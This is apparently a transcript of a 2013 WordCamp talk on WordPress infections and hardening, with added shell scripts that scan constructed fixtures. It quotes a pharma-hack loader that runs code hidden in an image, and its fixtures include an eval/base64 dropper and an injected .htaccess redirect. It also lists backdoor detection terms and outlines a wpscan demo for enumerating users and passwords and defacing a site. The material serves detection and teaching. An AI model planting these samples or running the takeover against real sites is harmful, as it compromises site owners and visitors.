WordPress Security - WordCamp phoenix 2013

WordPress security at WordCamp Phoenix 2013.

Usage Rights

© All Rights Reserved

Presentation Transcript

• WordPress Security: Dealing with Today's Hacks

• If you don't ask, you don't get!
  – Dre Armeda, CISSP
  – CEO, Co-Founder at Sucuri Inc.
  – @dremeda
  – Dre.im
  I'm a Harley enthusiast, and a Chargers fan. I wear many hats, and love tacos. I'm infatuated with WordPress, web design, and web security. I work at Sucuri Security. I hope to help make the web a safer place!
  1/19/2013 Dre Armeda - @dremeda #wcphx

• Why listen to me? You don't have to, but…
  – 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy.
    • Managed security awareness for Sempra Energy
    • Deployed security suite for 1-800-Flowers.
    • Cleaned Martha Stewart web properties of malware
  – Not an expert, passionate enthusiast.
  – Seriously though, quick Sucuri stats:
    • Remediate 200-300 infected websites a day, 24/7/365
    • Perform 2 million+ malware website scans a month
    • Support all CMS platforms and custom applications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc.)
  My goal in life is to make the web a safer place!

• Thoughts To Kick Things Off
  – Information Security is about risk reduction.
    • If you're looking for the "silver bullet", this is the wrong talk for you.
  – To think that you will never be infected is like saying you will never be sick.
    • Someone tells you different? Percussion calibration time.
  – Prevention is ideal, but not realistic.
    • Risk will never be 0%.
    • Detection is key.

• Know Your Enemy
  – They have time & resources
  – They are intelligent
  – Attacks are automated
  – Goal is to impact quantity
  – Own one, own them all…
  – It's not personal

• Ok, so what's the problem? Today's issues:
  – The Ecosystem / Environment
  – Access Control
  – Software Vulnerabilities
  – Administration
  – Credential Management
  – Extensibility

• Today's Focus
  – Ecosystem / Environment
  – Access Control
  – Dealing with Hacks

• Logical Architecture (stack diagram): Linux Operating System / Apache, MySQL, PHP / WordPress / cPanel, Plesk, phpMyAdmin, PHP-CGI / Modules

• The EcoSystem / Environment
  – Apache: malicious module injects iFrames
    http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/
  – phpMyAdmin: mirror hacked
    http://sourceforge.net/blog/phpmyadmin-back-door/
  – PHP-CGI: remote code execution
    http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
  – Plesk: vulnerable to SQLi attacks
    http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html

• The EcoSystem / Environment: what can you do?
  – Not much… it is completely outside of your control if you're using a shared or managed host.
  – But you can reduce risk:
    • Use a dedicated / VPS environment, but recognize the responsibility that this entails; if what I mentioned previously doesn't make sense, skip to the next step.
    • Go with a managed host. It doesn't mean you'll be safer, but it does mean you'll have resources to lean on.

• Access is Key
  – We have to change the way we treat and think about access. All access: server and application.
  – We are going through the same mistakes servers and desktops were making in the 90's with access.
  – Know where you are surfing the web: do you really need to log in as an admin at the coffee shop?

• Before We Dive In
• WordPress-Loving Infections
  – Defacements
  – Backdoors
  – Pharma Hack
  – Injections (iFrame specifically)
  – Malicious Redirects
  – Phishing

• DEFACEMENTS: Hacktivism at its finest… you now support a cause!?!?!

• Defacements
  – Hacktivism 101: annoying as S*&T
  – Places to look:
    • index.html
    • index.php (root directory, wp-content, theme directory)
  – grep is your friend (recursive, case-insensitive search of the whole tree for the defacer's tag):
      grep -ri 'sniper399' .

• BACKDOORS: It's ok to cry a little…

• Backdoors
  – Common terms (function names and strings that show up in backdoor code):
    is_bot, eval, base64_decode, fopen, fclose, readfile, edoced_46esab (base64_decode spelled backwards, reversed again at runtime), exec, system, shell_exec, gzuncompress, popen, FilesMan

• PHARMA HACK: Erectile dysfunction pills are leading ads… who knew.

• Pharma Hack
  – Multi-million $ business
  – Rarely distributes malware
  – Impression-based affiliate marketing
  – Google's Search Engine Result Pages (SERP)
  – Odds of malware distribution are actually low
  – Tricks:
    • Embedded within core files
    • Look for ".tmp" directories

• Pharma Hack, cntd..
  – Try using curl to emulate Googlebot (and a Windows browser) and see what a search engine is served:
      curl -L -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://someinfectedwebsite.com
  – Google Webmaster Tools: Fetch as Googlebot
  – Check your theme index.php file for things like this (the code is read out of an image file and executed):
      <?php $wp__theme_icon=@create_function('',@file_get_contents('/public_html/wp-content/themes/my-really-good-theme/images/s.jpg'));$wp__theme_icon(); ?>
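The backdoor term list and the pharma loader above translate directly into a first-pass triage scan. The script below is an added example, not code from the talk or from Sucuri: it builds a small constructed fixture tree (the file names, contents and the `.tmp` directory are assumptions, not real samples) and runs three checks over it: a whole-word grep for the listed terms in PHP files, a grep for the create_function / file_get_contents-on-an-image loader pattern, and a find for `.tmp` directories.

```sh
#!/bin/sh
# Added example, not from the slides: triage scan for the backdoor and pharma-hack
# indicators the talk lists. The files below are a constructed fixture standing in
# for a WordPress document root; paths and contents are assumptions.
FIXTURE="$(mktemp -d)"
mkdir -p "$FIXTURE/wp-content/themes/demo/images" \
         "$FIXTURE/wp-content/uploads" \
         "$FIXTURE/wp-content/.tmp"

# Clean theme file: contains none of the listed terms, must not be flagged.
cat > "$FIXTURE/wp-content/themes/demo/functions.php" <<'EOF'
<?php
function demo_setup() { add_theme_support('post-thumbnails'); }
add_action('after_setup_theme', 'demo_setup');
EOF

# Theme index.php carrying the loader shown on the slide: code hidden in an image file.
cat > "$FIXTURE/wp-content/themes/demo/index.php" <<'EOF'
<?php $wp__theme_icon=@create_function('',@file_get_contents('/public_html/wp-content/themes/demo/images/s.jpg'));$wp__theme_icon(); ?>
EOF

# Dropped file in uploads using eval/base64_decode (the encoded string is just "constructed").
cat > "$FIXTURE/wp-content/uploads/img.php" <<'EOF'
<?php eval(base64_decode("Y29uc3RydWN0ZWQ=")); ?>
EOF

# Terms from the slide, plus edoced_46esab (base64_decode backwards, fed to strrev()).
BACKDOOR_TERMS='is_bot|eval|base64_decode|edoced_46esab|fopen|fclose|readfile|exec|system|shell_exec|gzuncompress|popen|FilesMan'

# Print file:line:text for every PHP line under $1 containing one of the terms as a whole word.
scan_backdoor_terms() {
    grep -rniwE --include='*.php' "($BACKDOOR_TERMS)" "$1" || true
}

# Number of lines flagged by scan_backdoor_terms under $1.
count_backdoor_hits() {
    scan_backdoor_terms "$1" | wc -l | tr -d ' '
}

# List PHP files that build code at runtime with create_function(), or read a
# .jpg/.png/.gif with file_get_contents(): the pharma loader pattern from the slide.
scan_pharma_loader() {
    grep -rliE --include='*.php' \
        'create_function[[:space:]]*\(|file_get_contents[[:space:]]*\([^)]*\.(jpe?g|png|gif)' \
        "$1" || true
}

# Directories named .tmp, which the slide calls out as a pharma-hack hiding place.
find_tmp_dirs() {
    find "$1" -type d -name '.tmp'
}

echo "== backdoor terms =="; scan_backdoor_terms "$FIXTURE"
echo "== pharma loaders =="; scan_pharma_loader "$FIXTURE"
echo "== .tmp dirs =="; find_tmp_dirs "$FIXTURE"
```

Point it at a real site by replacing `$FIXTURE` with the document root. Expect noise: `system`, `exec` and `eval` are legitimate in some plugins, so treat hits as a review list rather than a verdict, and diff flagged files against a clean copy of the same plugin or theme version before deleting anything.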
• Pharma Hack, cntd.. (image-only slide)

• INJECTIONS: It only hurts for a minute…

• Injections
  – Invisible iFrames, executing in your browser
  – Contributing to drive-by downloads, pharma, XSS, CSRF
  – Places to check, pages that generate content: JS files, header.php, index.php, functions.php, footer.php

• Injections, cntd…
  – PHP iFrame injection: Count##.php
  – Check all index.php / theme JS files
  – Example below:

• Injections, cntd…
  – Pharma link injections
  – Drive-by downloads

• MALICIOUS REDIRECTS: WTF?!?! Why don't I understand what it says?

• Malicious Redirects
  – Redirects your user to a domain distributing malware; fundamentally different from an iFrame injection, which executes in your browser
  – 8 out of 10 times, check your .htaccess file. All of them:
      find /var/www -name .htaccess -type f | wc -l
  – Check for backdoors also; they are often a sign of a bigger issue
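The find command above tells you how many .htaccess files exist; the added example below (mine, not the presenter's) goes one step further and flags the ones carrying a redirect to an absolute URL or a rule conditioned on the referer or user agent, the shape injected redirect rules usually take. Both .htaccess files are constructed fixtures, and `malicious-redirect.example` is a placeholder domain.

```sh
#!/bin/sh
# Added example, not from the slides: enumerate every .htaccess under a document
# root (the slide's find command) and flag the ones that look like injected redirects.
FIXTURE2="$(mktemp -d)"
mkdir -p "$FIXTURE2/site/wp-content/uploads"

# Constructed clean file: the stock WordPress permalink rules.
cat > "$FIXTURE2/site/.htaccess" <<'EOF'
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
EOF

# Constructed injected file: sends search-engine referrals off-site (placeholder domain).
cat > "$FIXTURE2/site/wp-content/uploads/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteRule .* http://malicious-redirect.example/go.php [R=302,L]
EOF

# Every .htaccess file below $1, one path per line.
list_htaccess() {
    find "$1" -type f -name .htaccess
}

# How many of them there are (the number the slide's "| wc -l" gives you).
count_htaccess() {
    list_htaccess "$1" | wc -l | tr -d ' '
}

# Print the .htaccess files whose RewriteRule/Redirect target is an absolute URL,
# or whose RewriteCond keys on the referer or user agent. Either deserves a look.
flag_redirects() {
    list_htaccess "$1" | while read -r f; do
        if grep -qiE '^[[:space:]]*(RewriteRule|Redirect(Match)?)[[:space:]]+[^#]*https?://' "$f" \
           || grep -qiE '^[[:space:]]*RewriteCond[[:space:]]+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

echo "found $(count_htaccess "$FIXTURE2") .htaccess file(s)"
echo "== suspicious =="; flag_redirects "$FIXTURE2"
```

A flag is a prompt to read the file, not proof of compromise: a legitimate `Redirect 301` to the site's own canonical host will also match. What should not exist at all is an .htaccess with rewrite rules inside wp-content/uploads, and a referer-conditioned redirect anywhere in a WordPress tree is almost never something the site owner wrote.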
• PHISHING: Biggest growing problem, exceptionally difficult to detect…

• Phishing
  – Growing at a faster pace than traditional web malware
  – No impact to readers, but tied to SPAM bots sending out emails like this:

• Phishing, cntd… (image-only slide)

• DEMONSTRATION: Bringing the point home

• Demo Objective
  – Use good tools for bad things: wpscan
  – Enumerate the users
  – Enumerate passwords
  – Own target WordPress site
  – Deface the website
  I have 5 minutes. Ready?

• KEEPING IT REAL: Remember the risk discussion?

• Update
  – Oldest version found in production: 1.5
  – Leading cause of cross-site contamination issues
  – Perhaps the simplest of tasks, yet we still find this:

• Access is Key
  – On the server:
    • Kill accounts that are not in use
    • FTP is the devil; slap yourself and switch to SFTP
    • Disable password auth & use key pairs
  – WordPress admin:
    • Multi-factor authentication on wp-admin
    • Two-factor authentication on wp-login.php
  – Employ least privilege:
    • Only use admin accounts for admin tasks
    • Learn to use Editor, Author, Contributor, Subscriber

• Password Dilemma
  – 15 character pass: 3 months to crack
  – Long / complex / unique: key to passwords
  – Prefer a password manager. You don't? Ok.. passphrases work too: iLuvWCLpHX:2013:S@nT@N b@By
  – Come up with a process & stick to it:
    • One scheme: remember 8 characters, write down 8 characters, save 20 characters
    • Second scheme: remember 20 characters, prefix characters with site name, end sequence with some date

• Kill PHP Execution
  – Directories: wp-includes, wp-content, uploads
  – At a minimum, in each directory's .htaccess:
      <Files *.php>
      Deny from all
      </Files>

• Disable Theme / Plugin Editor
  I'd take it a step further and remove the ability to install, but that's just me.
  Modify wp-config.php with:
  – Disable the plugin / theme editor:
      define('DISALLOW_FILE_EDIT', true);
  – OR disable plugin / theme update and installation:
      define('DISALLOW_FILE_MODS', true);
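An added audit script (not from the slides) that checks both hardening steps above on a WordPress root: a per-directory .htaccess denying `*.php` (accepting the Apache 2.2 `Deny from all` form shown on the slide as well as the Apache 2.4 `Require all denied` form) and the two wp-config.php constants. The fixture tree is constructed so that some controls are deliberately missing, which is what the audit reports.

```sh
#!/bin/sh
# Added example, not from the slides: audit a WordPress root for the "Kill PHP
# Execution" .htaccess rules and the DISALLOW_FILE_* constants. Constructed fixture:
# only uploads/ has the deny rule, and wp-config.php disables the editor but not installs.
FIXTURE3="$(mktemp -d)"
mkdir -p "$FIXTURE3/wp-includes" "$FIXTURE3/wp-content/uploads"

cat > "$FIXTURE3/wp-content/uploads/.htaccess" <<'EOF'
<Files *.php>
Deny from all
</Files>
EOF

cat > "$FIXTURE3/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
define('DISALLOW_FILE_EDIT', true);
EOF

# Exit 0 if $1/.htaccess denies *.php with either the 2.2 or the 2.4 Apache syntax.
php_exec_blocked() {
    [ -f "$1/.htaccess" ] || return 1
    grep -qiE '<Files[[:space:]]+"?\*\.php"?>' "$1/.htaccess" || return 1
    grep -qiE '^[[:space:]]*(Deny[[:space:]]+from[[:space:]]+all|Require[[:space:]]+all[[:space:]]+denied)' "$1/.htaccess"
}

# Exit 0 if wp-config.php under $1 defines constant $2 as true.
wp_constant_true() {
    grep -qiE "define[[:space:]]*\([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*true[[:space:]]*\)" "$1/wp-config.php"
}

# Print one MISSING line per control that is absent under root $1.
audit_hardening() {
    root="$1"
    for d in wp-includes wp-content wp-content/uploads; do
        php_exec_blocked "$root/$d" || echo "MISSING: PHP execution not blocked in $d"
    done
    for c in DISALLOW_FILE_EDIT DISALLOW_FILE_MODS; do
        wp_constant_true "$root" "$c" || echo "MISSING: $c not set to true"
    done
}

# Number of missing controls (0 means fully hardened per the slides).
count_missing_controls() {
    audit_hardening "$1" | grep -c '^MISSING' || true
}

audit_hardening "$FIXTURE3"
echo "missing controls: $(count_missing_controls "$FIXTURE3")"
```

Two caveats when applying the rule for real: `Deny from all` only works on Apache 2.4 if mod_access_compat is loaded, so prefer `Require all denied` there; and after adding it to wp-includes, confirm the admin still works, because some files under wp-includes (the TinyMCE loader, for example) are requested directly by the browser and may need an explicit exception.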
• Plugins That Help
  – Sucuri clients: Sucuri Security Plugin, Theme-Check, BackupBuddy, Akismet
  – Non-clients: Limit Login Attempts, Theme-Check, BackupBuddy, Akismet

• Need a Hand?
  – Support forums:
    • Hacked: http://wordpress.org/tags/hacked
    • Malware: http://wordpress.org/tags/malware
    • BadwareBusters: https://badwarebusters.org
  – Online resources:
    • Sucuri Blog: http://blog.sucuri.net
    • SiteCheck Scanner: http://sitecheck.sucuri.net
    • Unmask Parasites: http://unmaskparasites.com
    • Perishable Press: http://perishablepress.com/category/web-design/security/
    • Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress

• Dre Armeda, CISSP
  – Dre.im
  – @dremeda
  – Sucuri Inc.: http://sucuri.net, http://blog.sucuri.net, @sucuri_security
  Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.